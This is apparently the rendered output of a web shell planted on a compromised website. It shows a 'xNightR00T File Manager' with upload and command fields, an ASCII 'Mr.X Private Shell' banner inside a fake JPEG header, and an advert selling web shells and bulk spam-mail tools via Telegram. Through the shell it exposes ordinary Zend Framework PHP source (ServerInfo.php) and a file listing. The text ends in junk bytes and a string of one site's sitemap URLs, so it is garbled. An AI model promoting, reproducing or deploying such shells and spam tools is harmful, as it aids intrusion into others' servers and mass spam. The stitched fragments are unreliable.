xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

require_once 'ZendX/Service/ZendServer/Message.php';

class ZendX_Service_ZendServer_ServerInfo
{
    /**
     * Server status constants
     */
    const OK                 = 'OK';
    const SHUTTING_DOWN      = 'shuttingDown';
    const STARTING_UP        = 'startingUp';
    const PENDING_RESTART    = 'pendingRestart'; 
    const RESTARTING         = 'restarting';
    const MISCONFIGURED      = 'misconfigured';
    const EXTENSION_MISMATCH = 'extensionMismatch';
    const DAEMON_MISMATCH    = 'daemonMismatch';
    const NOT_RESPONDING     = 'notResponding';
    const DISABLED           = 'disabled';
    const REMOVED            = 'removed';
    const UNKNOWN            = 'unknown';
    
    /**
     * Server ID
     * 
     * @var integer
     */
    protected $_id       = null;
    
    /**
     * Server name
     * 
     * @var string
     */
    protected $_name     = null;
    
    /**
     * Server address
     * 
     * @var string
     */
    protected $_address  = null;
    
    /**
     * Server status
     * 
     * @var string
     */
    protected $_status   = null;
    
    /**
     * Server messages
     * 
     * @var array of ZendX_Service_ZendServer_Messages
     */
    protected $_messages = array();
    
    /**
     * Create a new serverInfo object from a response XML element
     * 
     * @param SimpleXMLElement $responseXml
     */
    public function __construct(SimpleXMLElement $xml)
    {
        if ($xml->getName() !== 'serverInfo') {
            require_once 'ZendX/Service/ZendServer/Exception.php'; 
            throw new ZendX_Service_ZendServer_Exception("Unexpected base XML element: {$xml->getName()}");
        }
        
        if (!empty($xml->id)) $this->_id = (int) $xml->id; // as to avoid silent casting of an empty value to 0
        $this->_name    = (string) $xml->name;
        $this->_address = (string) $xml->address;
        $this->_status  = (string) $xml->status;
        
        /* NOT VALIDTING these fields, as when dealing with single server, they're not populated
        if (! $this->_id) { 
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Missing server ID in serverInfo XML");
        }
        
        if (! $this->_name) {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Missing server name in serverInfo XML");
        }
        
        if (! $this->_address) { 
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Missing server address in serverInfo XML");
        }*/
        
        if (! $this->_status) { 
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Missing server status in serverInfo XML");
        }
        
        foreach($xml->messageList->children() as $message) { 
            $this->_messages[] = new ZendX_Service_ZendServer_Message($message);
        }
    }
    
    /**
     * 
     * Enter description here ...
     */
    public function getId()
    {
        return $this->_id;
    }
    
    /**
     * 
     * Enter description here ...
     */
    public function getName()
    {
        return $this->_name;
    }
    
    /**
     * 
     * Enter description here ...
     */
    public function getAddress()
    {
        return $this->_address;
    }
    
    /**
     * 
     * Enter description here ...
     */
    public function getStatus()
    {
        return $this->_status;
    }
    
    /**
     * 
     * Enter description here ...
     */
    public function getMessages()
    {
        return $this->_messages;
    }
}

Filemanager

Name Type Size Permission Actions
ApplicationInfo.php File 5.19 KB 0644
ApplicationServer.php File 2.06 KB 0644
ApplicationsList.php File 2.51 KB 0644
Exception.php File 1.56 KB 0644
LibraryInfo.php File 4.25 KB 0644
LicenseInfo.php File 2.99 KB 0644
Message.php File 1.1 KB 0644
Response.php File 5.99 KB 0644
ServerInfo.php File 3.68 KB 0644
ServersList.php File 2.02 KB 0644
SystemInfo.php File 2.96 KB 0644
bootstrapResponse.php File 2.35 KB 0644
libraryVersion.php File 2.38 KB 0644
vhostInfo.php File 2.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml